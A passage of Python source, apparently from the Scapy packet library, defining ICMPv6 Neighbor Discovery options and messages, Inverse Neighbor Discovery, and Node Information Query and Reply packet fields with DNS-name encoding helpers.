   1735     def i2m(self, pkt, x):
   1736         s = raw(x)
   1737         l = len(s)
   1738         r = (l + self.cur_shift) % 8
   1739         l = l - r
   1740         return s[:l]
   1742     def i2len(self, pkt, i):
   1743         return len(self.i2m(pkt, i))
   1746 # Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
   1747 class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
   1748     name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
   1749     fields_desc = [ ByteField("type",4),
   1750                     FieldLenField("len", None, length_of="pkt", fmt="B",
   1751                                   adjust = lambda pkt,x:(x+8)//8),
   1752                     StrFixedLenField("res", b"\x00"*6, 6),
   1753                     TruncPktLenField("pkt", b"", IPv6, 8,
   1754                                      length_from = lambda pkt: 8*pkt.len-8) ]
   1756 # See which value should be used for default MTU instead of 1280
   1757 class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
   1758     name = "ICMPv6 Neighbor Discovery Option - MTU"
   1759     fields_desc = [ ByteField("type",5),
   1760                     ByteField("len",1),
   1761                     XShortField("res",0),
   1762                     IntField("mtu",1280)]
   1764 class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
   1765     name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
   1766     fields_desc = [ ByteField("type", 6),
   1767                     ByteField("len", 1),
   1768                     ByteField("shortcutlim", 40), # XXX
   1769                     ByteField("res1", 0),
   1770                     IntField("res2", 0) ]
   1772 class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
   1773     name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
   1774     fields_desc = [ ByteField("type",7),
   1775                     ByteField("len",1),
   1776                     ShortField("res", 0),
   1777                     IntField("advint", 0) ]
   1778     def mysummary(self):
   1779         return self.sprintf("%name% %advint% milliseconds")
   1781 class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
   1782     name = "ICMPv6 Neighbor Discovery - Home Agent Information"
   1783     fields_desc = [ ByteField("type",8),
   1784                     ByteField("len",1),
   1785                     ShortField("res", 0),
   1786                     ShortField("pref", 0),
   1787                     ShortField("lifetime", 1)]
   1788     def mysummary(self):
   1789         return self.sprintf("%name% %pref% %lifetime% seconds")
   1791 # type 9  : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
   1793 # type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
   1795 class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
   1796     name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
   1797     fields_desc = [ ByteField("type",17),
   1798                     ByteField("len", 3),
   1799                     ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
   1800                                                  2: "New Care-Of Address",
   1801                                                  3: "NAR's IP address" }),
   1802                     ByteField("plen", 64),
   1803                     IntField("res", 0),
   1804                     IP6Field("addr", "::") ]
   1806 class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
   1807     name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
   1808     fields_desc = [ ByteField("type",18),
   1809                     ByteField("len", 3),
   1810                     ByteField("optcode", 0),
   1811                     ByteField("plen", 64),
   1812                     IntField("res", 0),
   1813                     IP6Field("prefix", "::") ]
   1815 _rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
   1816                         1: "LLA for the new AP",
   1817                         2: "LLA of the MN",
   1818                         3: "LLA of the NAR",
   1819                         4: "LLA of the src of TrSolPr or PrRtAdv msg",
   1820                         5: "AP identified by LLA belongs to current iface of router",
   1821                         6: "No preifx info available for AP identified by the LLA",
   1822                         7: "No fast handovers support for AP identified by the LLA" }
   1824 class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):     # RFC 4068
   1825     name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
   1826     fields_desc = [ ByteField("type", 19),
   1827                     ByteField("len", 1),
   1828                     ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
   1829                     MACField("lla", ETHER_ANY) ] # We only support ethernet
   1831 class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):     # RFC 4140
   1832     name = "ICMPv6 Neighbor Discovery - MAP Option"
   1833     fields_desc = [ ByteField("type", 23),
   1834                     ByteField("len", 3),
   1835                     BitField("dist", 1, 4),
   1836                     BitField("pref", 15, 4), # highest availability
   1837                     BitField("R", 1, 1),
   1838                     BitField("res", 0, 7),
   1839                     IntField("validlifetime", 0xffffffff),
   1840                     IP6Field("addr", "::") ]
   1843 class _IP6PrefixField(IP6Field):
   1844     __slots__ = ["length_from"]
   1845     def __init__(self, name, default):
   1846         IP6Field.__init__(self, name, default)
   1847         self.length_from = lambda pkt: 8*(pkt.len - 1)
   1849     def addfield(self, pkt, s, val):
   1850         return s + self.i2m(pkt, val)
   1852     def getfield(self, pkt, s):
   1853         l = self.length_from(pkt)
   1854         p = s[:l]
   1855         if l < 16:
   1856             p += b'\x00'*(16-l)
   1857         return s[l:], self.m2i(pkt,p)
   1859     def i2len(self, pkt, x):
   1860         return len(self.i2m(pkt, x))
   1862     def i2m(self, pkt, x):
   1863         l = pkt.len
   1865         if x is None:
   1866             x = "::"
   1867             if l is None:
   1868                 l = 1
   1869         x = inet_pton(socket.AF_INET6, x)
   1871         if l is None:
   1872             return x
   1873         if l in [0, 1]:
   1874             return b""
   1875         if l in [2, 3]:
   1876             return x[:8*(l-1)]
   1878         return x + b'\x00'*8*(l-3)
   1880 class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
   1881     name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
   1882     fields_desc = [ ByteField("type",24),
   1883                     FieldLenField("len", None, length_of="prefix", fmt="B",
   1884                                   adjust = lambda pkt,x: x//8 + 1),
   1885                     ByteField("plen", None),
   1886                     BitField("res1",0,3),
   1887                     BitField("prf",0,2),
   1888                     BitField("res2",0,3),
   1889                     IntField("rtlifetime", 0xffffffff),
   1890                     _IP6PrefixField("prefix", None) ]
   1892 class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
   1893     name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
   1894     fields_desc = [ ByteField("type", 25),
   1895                     FieldLenField("len", None, count_of="dns", fmt="B",
   1896                                   adjust = lambda pkt,x: 2*x+1),
   1897                     ShortField("res", None),
   1898                     IntField("lifetime", 0xffffffff),
   1899                     IP6ListField("dns", [],
   1900                                  length_from = lambda pkt: 8*(pkt.len-1)) ]
   1902 class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
   1903     name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
   1904     fields_desc = [ ByteField("type", 26),
   1905                     ByteField("len", 1),
   1906                     BitField("res", 0, 48) ]
   1908 # As required in Sect 8. of RFC 3315, Domain Names must be encoded as
   1909 # described in section 3.1 of RFC 1035
   1910 # XXX Label should be at most 63 octets in length : we do not enforce it
   1911 #     Total length of domain should be 255 : we do not enforce it either
   1912 class DomainNameListField(StrLenField):
   1913     __slots__ = ["padded"]
   1914     islist = 1
   1915     padded_unit = 8
   1917     def __init__(self, name, default, fld=None, length_from=None, padded=False):
   1918         self.padded = padded
   1919         StrLenField.__init__(self, name, default, fld, length_from)
   1921     def i2len(self, pkt, x):
   1922         return len(self.i2m(pkt, x))
   1924     def m2i(self, pkt, x):
   1925         x = plain_str(x) # Decode bytes to string
   1926         res = []
   1927         while x:
   1928             # Get a name until \x00 is reached
   1929             cur = []
   1930             while x and ord(x[0]) != 0:
   1931                 l = ord(x[0])
   1932                 cur.append(x[1:l+1])
   1933                 x = x[l+1:]
   1934             if self.padded:
   1935                 # Discard following \x00 in padded mode
   1936                 if len(cur):
   1937                     res.append(".".join(cur) + ".")
   1938             else:
   1939               # Store the current name
   1940               res.append(".".join(cur) + ".")
   1941             if x and ord(x[0]) == 0:
   1942                 x = x[1:]
   1943         return res
   1945     def i2m(self, pkt, x):
   1946         def conditionalTrailingDot(z):
   1947             if z and orb(z[-1]) == 0:
   1948                 return z
   1949             return z+b'\x00'
   1950         # Build the encode names
   1951         tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes
   1952         ret_string  = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
   1954         # In padded mode, add some \x00 bytes
   1955         if self.padded and not len(ret_string) % self.padded_unit == 0:
   1956             ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)
   1958         return ret_string
   1960 class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
   1961     name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
   1962     fields_desc = [ ByteField("type", 31),
   1963                     FieldLenField("len", None, length_of="searchlist", fmt="B",
   1964                                   adjust=lambda pkt, x: 1+ x//8),
   1965                     ShortField("res", None),
   1966                     IntField("lifetime", 0xffffffff),
   1967                     DomainNameListField("searchlist", [],
   1968                                         length_from=lambda pkt: 8*pkt.len -8,
   1969                                         padded=True)
   1970                     ]
   1972 # End of ICMPv6 Neighbor Discovery Options.
   1974 class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
   1975     name = "ICMPv6 Neighbor Discovery - Router Solicitation"
   1976     fields_desc = [ ByteEnumField("type", 133, icmp6types),
   1977                     ByteField("code",0),
   1978                     XShortField("cksum", None),
   1979                     IntField("res",0) ]
   1980     overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }}
   1982 class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
   1983     name = "ICMPv6 Neighbor Discovery - Router Advertisement"
   1984     fields_desc = [ ByteEnumField("type", 134, icmp6types),
   1985                     ByteField("code",0),
   1986                     XShortField("cksum", None),
   1987                     ByteField("chlim",0),
   1988                     BitField("M",0,1),
   1989                     BitField("O",0,1),
   1990                     BitField("H",0,1),
   1991                     BitEnumField("prf",1,2, { 0: "Medium (default)",
   1992                                               1: "High",
   1993                                               2: "Reserved",
   1994                                               3: "Low" } ), # RFC 4191
   1995                     BitField("P",0,1),
   1996                     BitField("res",0,2),
   1997                     ShortField("routerlifetime",1800),
   1998                     IntField("reachabletime",0),
   1999                     IntField("retranstimer",0) ]
   2000     overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
   2002     def answers(self, other):
   2003         return isinstance(other, ICMPv6ND_RS)
   2005 class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
   2006     name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
   2007     fields_desc = [ ByteEnumField("type",135, icmp6types),
   2008                     ByteField("code",0),
   2009                     XShortField("cksum", None),
   2010                     IntField("res", 0),
   2011                     IP6Field("tgt","::") ]
   2012     overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
   2014     def mysummary(self):
   2015         return self.sprintf("%name% (tgt: %tgt%)")
   2017     def hashret(self):
   2018         return raw(self.tgt)+self.payload.hashret()
   2020 class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
   2021     name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
   2022     fields_desc = [ ByteEnumField("type",136, icmp6types),
   2023                     ByteField("code",0),
   2024                     XShortField("cksum", None),
   2025                     BitField("R",1,1),
   2026                     BitField("S",0,1),
   2027                     BitField("O",1,1),
   2028                     XBitField("res",0,29),
   2029                     IP6Field("tgt","::") ]
   2030     overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
   2032     def mysummary(self):
   2033         return self.sprintf("%name% (tgt: %tgt%)")
   2035     def hashret(self):
   2036         return raw(self.tgt)+self.payload.hashret()
   2038     def answers(self, other):
   2039         return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
   2041 # associated possible options : target link-layer option, Redirected header
   2042 class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
   2043     name = "ICMPv6 Neighbor Discovery - Redirect"
   2044     fields_desc = [ ByteEnumField("type",137, icmp6types),
   2045                     ByteField("code",0),
   2046                     XShortField("cksum", None),
   2047                     XIntField("res",0),
   2048                     IP6Field("tgt","::"),
   2049                     IP6Field("dst","::") ]
   2050     overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
   2054 ################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
   2056 class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
   2057     name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
   2058     fields_desc = [ ByteField("type",9),
   2059                     FieldLenField("len", None, count_of="addrlist", fmt="B",
   2060                                   adjust = lambda pkt,x: 2*x+1),
   2061                     StrFixedLenField("res", b"\x00"*6, 6),
   2062                     IP6ListField("addrlist", [],
   2063                                 length_from = lambda pkt: 8*(pkt.len-1)) ]
   2065 class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
   2066     name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
   2067     type = 10
   2070 # RFC3122
   2071 # Options requises : source lladdr et target lladdr
   2072 # Autres options valides : source address list, MTU
   2073 # - Comme precise dans le document, il serait bien de prendre l'adresse L2
   2074 #   demandee dans l'option requise target lladdr et l'utiliser au niveau
   2075 #   de l'adresse destination ethernet si aucune adresse n'est precisee
   2076 # - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
   2077 #   les options.
   2078 # Ether() must use the target lladdr as destination
   2079 class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
   2080     name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
   2081     fields_desc = [ ByteEnumField("type",141, icmp6types),
   2082                     ByteField("code",0),
   2083                     XShortField("cksum",None),
   2084                     XIntField("reserved",0) ]
   2085     overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
   2087 # Options requises :  target lladdr, target address list
   2088 # Autres options valides : MTU
   2089 class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
   2090     name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
   2091     fields_desc = [ ByteEnumField("type",142, icmp6types),
   2092                     ByteField("code",0),
   2093                     XShortField("cksum",None),
   2094                     XIntField("reserved",0) ]
   2095     overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
   2098 ###############################################################################
   2099 # ICMPv6 Node Information Queries (RFC 4620)
   2100 ###############################################################################
   2102 # [ ] Add automatic destination address computation using computeNIGroupAddr
   2103 #     in IPv6 class (Scapy6 modification when integrated) if :
   2104 #     - it is not provided
   2105 #     - upper layer is ICMPv6NIQueryName() with a valid value
   2106 # [ ] Try to be liberal in what we accept as internal values for _explicit_
   2107 #     DNS elements provided by users. Any string should be considered
   2108 #     valid and kept like it has been provided. At the moment, i2repr() will
   2109 #     crash on many inputs
   2110 # [ ] Do the documentation
   2111 # [ ] Add regression tests
   2112 # [ ] Perform test against real machines (NOOP reply is proof of implementation).
   2113 # [ ] Check if there are differences between different stacks. Among *BSD,
   2114 #     with others.
   2115 # [ ] Deal with flags in a consistent way.
   2116 # [ ] Implement compression in names2dnsrepr() and decompresiion in
   2117 #     dnsrepr2names(). Should be deactivable.
   2119 icmp6_niqtypes = { 0: "NOOP",
   2120                   2: "Node Name",
   2121                   3: "IPv6 Address",
   2122                   4: "IPv4 Address" }
   2125 class _ICMPv6NIHashret:
   2126     def hashret(self):
   2127         return self.nonce
   2129 class _ICMPv6NIAnswers:
   2130     def answers(self, other):
   2131         return self.nonce == other.nonce
   2133 # Buggy; always returns the same value during a session
   2134 class NonceField(StrFixedLenField):
   2135     def __init__(self, name, default=None):
   2136         StrFixedLenField.__init__(self, name, default, 8)
   2137         if default is None:
   2138             self.default = self.randval()
   2140 @conf.commands.register
   2141 def computeNIGroupAddr(name):
   2142     """Compute the NI group Address. Can take a FQDN as input parameter"""
   2143     name = name.lower().split(".")[0]
   2144     record = chr(len(name))+name
   2145     h = md5(record.encode("utf8"))
   2146     h = h.digest()
   2147     addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
   2148     return addr
   2151 # Here is the deal. First, that protocol is a piece of shit. Then, we
   2152 # provide 4 classes for the different kinds of Requests (one for every
   2153 # valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
   2154 # data field class that is made to be smart by guessing the specific
   2155 # type of value provided :
   2156 #
   2157 # - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
   2158 #   if not overridden by user
   2159 # - IPv4 if acceptable for inet_pton(AF_INET,  ): code is set to 2,
   2160 #   if not overridden
   2161 # - Name in the other cases: code is set to 0, if not overridden by user
   2162 #
   2163 # Internal storage, is not only the value, but the a pair providing
   2164 # the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
   2165 #
   2166 # Note : I merged getfield() and m2i(). m2i() should not be called
   2167 #        directly anyway. Same remark for addfield() and i2m()
   2168 #
   2169 # -- arno
   2171 # "The type of information present in the Data field of a query is
   2172 #  declared by the ICMP Code, whereas the type of information in a
   2173 #  Reply is determined by the Qtype"
   2175 def names2dnsrepr(x):
   2176     """
   2177     Take as input a list of DNS names or a single DNS name
   2178     and encode it in DNS format (with possible compression)
   2179     If a string that is already a DNS name in DNS format
   2180     is passed, it is returned unmodified. Result is a string.
   2181     !!!  At the moment, compression is not implemented  !!!
   2182     """
   2184     if isinstance(x, bytes):
   2185         if x and x[-1:] == b'\x00': # stupid heuristic
   2186             return x
   2187         x = [x]
   2189     res = []
   2190     for n in x:
   2191         termin = b"\x00"
   2192         if n.count(b'.') == 0: # single-component gets one more
   2193             termin += b'\x00'
   2194         n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
   2195         res.append(n)
   2196     return b"".join(res)
   2199 def dnsrepr2names(x):
   2200     """
   2201     Take as input a DNS encoded string (possibly compressed)
   2202     and returns a list of DNS names contained in it.
   2203     If provided string is already in printable format
   2204     (does not end with a null character, a one element list
   2205     is returned). Result is a list.
   2206     """
   2207     res = []
   2208     cur = b""
   2209     while x:
   2210         l = orb(x[0])
   2211         x = x[1:]
   2212         if not l:
   2213             if cur and cur[-1:] == b'.':
   2214                 cur = cur[:-1]
   2215             res.append(cur)
   2216             cur = b""
   2217             if x and orb(x[0]) == 0: # single component
   2218                 x = x[1:]
   2219             continue
   2220         if l & 0xc0: # XXX TODO : work on that -- arno
   2221             raise Exception("DNS message can't be compressed at this point!")
   2222         cur += x[:l] + b"."
   2223         x = x[l:]
   2224     return res
   2227 class NIQueryDataField(StrField):
   2228     def __init__(self, name, default):
   2229         StrField.__init__(self, name, default)
   2231     def i2h(self, pkt, x):
   2232         if x is None:
   2233             return x
   2234         t,val = x
   2235         if t == 1:
   2236             val = dnsrepr2names(val)[0]
   2237         return val
   2239     def h2i(self, pkt, x):
   2240         if x is tuple and isinstance(x[0], int):
   2241             return x
   2243         # Try IPv6
   2244         try:
   2245             inet_pton(socket.AF_INET6, x.decode())
   2246             return (0, x.decode())
   2247         except:
   2248             pass
   2249         # Try IPv4
   2250         try:
   2251             inet_pton(socket.AF_INET, x.decode())
   2252             return (2, x.decode())
   2253         except:
   2254             pass
   2255         # Try DNS
   2256         if x is None:
   2257             x = b""
   2258         x = names2dnsrepr(x)
   2259         return (1, x)
   2261     def i2repr(self, pkt, x):
   2262         x = plain_str(x)
   2263         t,val = x
   2264         if t == 1: # DNS Name
   2265             # we don't use dnsrepr2names() to deal with
   2266             # possible weird data extracted info
   2267             res = []
   2268             while val:
   2269                 l = orb(val[0])
   2270                 val = val[1:]
   2271                 if l == 0:
   2272                     break
   2273                 res.append(val[:l]+".")
   2274                 val = val[l:]
   2275             tmp = "".join(res)
   2276             if tmp and tmp[-1] == '.':
   2277                 tmp = tmp[:-1]
   2278             return tmp
   2279         return repr(val)
   2281     def getfield(self, pkt, s):
   2282         qtype = getattr(pkt, "qtype")
   2283         if qtype == 0: # NOOP
   2284             return s, (0, b"")
   2285         else:
   2286             code = getattr(pkt, "code")
   2287             if code == 0:   # IPv6 Addr
   2288                 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
   2289             elif code == 2: # IPv4 Addr
   2290                 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
   2291             else:           # Name or Unknown
   2292                 return b"", (1, s)
   2294     def addfield(self, pkt, s, val):
   2295         if ((isinstance(val, tuple) and val[1] is None) or
   2296             val is None):
   2297             val = (1, b"")
   2298         t = val[0]
   2299         if t == 1:
   2300             return s + val[1]
   2301         elif t == 0:
   2302             return s + inet_pton(socket.AF_INET6, val[1])
   2303         else:
   2304             return s + inet_pton(socket.AF_INET, val[1])
   2306 class NIQueryCodeField(ByteEnumField):
   2307     def i2m(self, pkt, x):
   2308         if x is None:
   2309             d = pkt.getfieldval("data")
   2310             if d is None:
   2311                 return 1
   2312             elif d[0] == 0: # IPv6 address
   2313                 return 0
   2314             elif d[0] == 1: # Name
   2315                 return 1
   2316             elif d[0] == 2: # IPv4 address
   2317                 return 2
   2318             else:
   2319                 return 1
   2320         return x
   2323 _niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
   2325 #_niquery_flags = {  2: "All unicast addresses", 4: "IPv4 addresses",
   2326 #                    8: "Link-local addresses", 16: "Site-local addresses",
   2327 #                   32: "Global addresses" }
   2329 # "This NI type has no defined flags and never has a Data Field". Used
   2330 # to know if the destination is up and implements NI protocol.
   2331 class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
   2332     name = "ICMPv6 Node Information Query - NOOP Query"
   2333     fields_desc = [ ByteEnumField("type", 139, icmp6types),
   2334                     NIQueryCodeField("code", None, _niquery_code),
   2335                     XShortField("cksum", None),
   2336                     ShortEnumField("qtype", 0, icmp6_niqtypes),
   2337                     BitField("unused", 0, 10),
   2338                     FlagsField("flags", 0, 6, "TACLSG"),
   2339                     NonceField("nonce", None),
   2340                     NIQueryDataField("data", None) ]
   2342 class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
   2343     name = "ICMPv6 Node Information Query - IPv6 Name Query"
   2344     qtype = 2
   2346 # We ask for the IPv6 address of the peer
   2347 class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
   2348     name = "ICMPv6 Node Information Query - IPv6 Address Query"
   2349     qtype = 3
   2350     flags = 0x3E
   2352 class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
   2353     name = "ICMPv6 Node Information Query - IPv4 Address Query"
   2354     qtype = 4
   2356 _nireply_code = { 0: "Successful Reply",
   2357                   1: "Response Refusal",
   2358                   3: "Unknown query type" }
   2360 _nireply_flags = {  1: "Reply set incomplete",
   2361                     2: "All unicast addresses",
   2362                     4: "IPv4 addresses",
   2363                     8: "Link-local addresses",
   2364                    16: "Site-local addresses",
   2365                    32: "Global addresses" }
   2367 # Internal repr is one of those :
   2368 # (0, "some string") : unknow qtype value are mapped to that one
   2369 # (3, [ (ttl, ip6), ... ])
   2370 # (4, [ (ttl, ip4), ... ])
   2371 # (2, [ttl, dns_names]) : dns_names is one string that contains
   2372 #     all the DNS names. Internally it is kept ready to be sent
   2373 #     (undissected). i2repr() decode it for user. This is to
   2374 #     make build after dissection bijective.
   2375 #
   2376 # I also merged getfield() and m2i(), and addfield() and i2m().
   2377 class NIReplyDataField(StrField):
   2379     def i2h(self, pkt, x):
   2380         if x is None:
   2381             return x
   2382         t,val = x
   2383         if t == 2:
   2384             ttl, dnsnames = val
   2385             val = [ttl] + dnsrepr2names(dnsnames)
   2386         return val
   2388     def h2i(self, pkt, x):
   2389         qtype = 0 # We will decode it as string if not
   2390                   # overridden through 'qtype' in pkt
   2392         # No user hint, let's use 'qtype' value for that purpose
   2393         if not isinstance(x, tuple):
   2394             if pkt is not None:
   2395                 qtype = pkt.qtype
   2396         else:
   2397             qtype = x[0]
   2398             x = x[1]
   2400         # From that point on, x is the value (second element of the tuple)
   2402         if qtype == 2: # DNS name
   2403             if isinstance(x, (str, bytes)): # listify the string
   2404                 x = [x]
   2405             if isinstance(x, list):
   2406                 x = [val.encode() if isinstance(val, str) else val for val in x]
   2407             if x and isinstance(x[0], six.integer_types):
   2408                 ttl = x[0]
   2409                 names = x[1:]
   2410             else:
   2411                 ttl = 0
   2412                 names = x
   2413             return (2, [ttl, names2dnsrepr(names)])
   2415         elif qtype in [3, 4]: # IPv4 or IPv6 addr
   2416             if not isinstance(x, list):
   2417                 x = [x] # User directly provided an IP, instead of list
   2419             def fixvalue(x):
   2420                 # List elements are not tuples, user probably
   2421                 # omitted ttl value : we will use 0 instead
   2422                 if not isinstance(x, tuple):
   2423                     x = (0, x)
   2424                 # Decode bytes
   2425                 if six.PY3 and isinstance(x[1], bytes):
   2426                     x = (x[0], x[1].decode())
   2427                 return x
   2429             return (qtype, [fixvalue(d) for d in x])
   2431         return (qtype, x)
   2434     def addfield(self, pkt, s, val):
   2435         t,tmp = val
   2436         if tmp is None:
   2437             tmp = b""
   2438         if t == 2:
   2439             ttl,dnsstr = tmp
   2440             return s+ struct.pack("!I", ttl) + dnsstr
   2441         elif t == 3:
   2442             return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0])+inet_pton(socket.AF_INET6, x_y1[1]), tmp))
   2443         elif t == 4:
   2444             return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0])+inet_pton(socket.AF_INET, x_y2[1]), tmp))
   2445         else:
   2446             return s + tmp
   2448     def getfield(self, pkt, s):
   2449         code = getattr(pkt, "code")
   2450         if code != 0:
   2451             return s, (0, b"")
   2453         qtype = getattr(pkt, "qtype")
   2454         if qtype == 0: # NOOP
   2455             return s, (0, b"")
   2457         elif qtype == 2:
   2458             if len(s) < 4:
   2459                 return s, (0, b"")
   2460             ttl = struct.unpack("!I", s[:4])[0]
   2461             return b"", (2, [ttl, s[4:]])
   2463         elif qtype == 3: # IPv6 addresses with TTLs
   2464             # XXX TODO : get the real length
   2465             res = []
   2466             while len(s) >= 20: # 4 + 16
   2467                 ttl = struct.unpack("!I", s[:4])[0]
   2468                 ip  = inet_ntop(socket.AF_INET6, s[4:20])
   2469                 res.append((ttl, ip))
   2470                 s = s[20:]
   2471             return s, (3, res)
   2473         elif qtype == 4: # IPv4 addresses with TTLs
   2474             # XXX TODO : get the real length
   2475             res = []
   2476             while len(s) >= 8: # 4 + 4
   2477                 ttl = struct.unpack("!I", s[:4])[0]
   2478                 ip  = inet_ntop(socket.AF_INET, s[4:8])
   2479                 res.append((ttl, ip))
   2480                 s = s[8:]
   2481             return s, (4, res)
   2482         else:
   2483             # XXX TODO : implement me and deal with real length
   2484             return b"", (0, s)
   2486     def i2repr(self, pkt, x):
   2487         if x is None:
   2488             return "[]"
   2490         if isinstance(x, tuple) and len(x) == 2:
   2491             t, val = x
   2492             if t == 2: # DNS names
   2493                 ttl,l = val
   2494                 l = dnsrepr2names(l)
   2495                 return "ttl:%d %s" % (ttl, ", ".join(l))
   2496             elif t == 3 or t == 4:
   2497                 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))
   2498             return repr(val)
   2499         return repr(x) # XXX should not happen
   2501 # By default, sent responses have code set to 0 (successful)
   2502 class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
   2503     name = "ICMPv6 Node Information Reply - NOOP Reply"
   2504     fields_desc = [ ByteEnumField("type", 140, icmp6types),
   2505                     ByteEnumField("code", 0, _nireply_code),
   2506                     XShortField("cksum", None),
   2507                     ShortEnumField("qtype", 0, icmp6_niqtypes),
   2508                     BitField("unused", 0, 10),
   2509                     FlagsField("flags", 0, 6, "TACLSG"),
   2510                     NonceField("nonce", None),
   2511                     NIReplyDataField("data", None)]
   2513 class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
   2514     name = "ICMPv6 Node Information Reply - Node Names"
   2515     qtype = 2
   2517 class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
   2518     name = "ICMPv6 Node Information Reply - IPv6 addresses"
   2519     qtype = 3
   2521 class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
   2522     name = "ICMPv6 Node Information Reply - IPv4 addresses"
   2523     qtype = 4
   2525 class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
   2526     name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
   2527     code = 1
   2529 class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
   2530     name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
   2531     code = 2
   2534 def _niquery_guesser(p):
   2535     cls = conf.raw_layer
   2536     type = orb(p[0])
   2537     if type == 139: # Node Info Query specific stuff
   2538         if len(p) > 6:
   2539             qtype, = struct.unpack("!H", p[4:6])
   2540             cls = { 0: ICMPv6NIQueryNOOP,
   2541                     2: ICMPv6NIQueryName,
   2542                     3: ICMPv6NIQueryIPv6,
   2543                     4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
   2544     elif type == 140: # Node Info Reply specific stuff
   2545         code = orb(p[1])
   2546         if code == 0:
   2547             if len(p) > 6:
   2548                 qtype, = struct.unpack("!H", p[4:6])
   2549                 cls = { 2: ICMPv6NIReplyName,
   2550                         3: ICMPv6NIReplyIPv6,
   2551                         4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
   2552         elif code == 1:
   2553             cls = ICMPv6NIReplyRefuse
   2554         elif code == 2:
